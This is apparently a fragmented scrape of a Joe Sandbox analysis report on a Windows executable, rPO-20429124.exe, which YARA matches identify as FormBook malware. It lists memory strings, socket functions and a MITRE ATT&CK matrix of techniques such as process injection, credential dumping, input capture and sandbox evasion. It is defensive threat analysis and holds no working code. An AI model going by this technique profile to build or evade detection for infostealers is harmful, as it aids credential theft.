Source: rPO-20429124.exe	Binary or memory string: WIN_81
Source: rPO-20429124.exe	Binary or memory string: WIN_XP
Source: rPO-20429124.exe	Binary or memory string: WIN_XPe
Source: rPO-20429124.exe	Binary or memory string: WIN_VISTA
Source: rPO-20429124.exe	Binary or memory string: WIN_7
Source: rPO-20429124.exe	Binary or memory string: WIN_8
Source: rPO-20429124.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4529137724.0000000000F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2175914455.00000000080D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529171574.0000000000F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4531314792.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4527985230.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2171988415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4529216494.0000000003A10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172584139.00000000041E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_001A6283
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_001A6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rPO-20429124.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
rPO-20429124.exe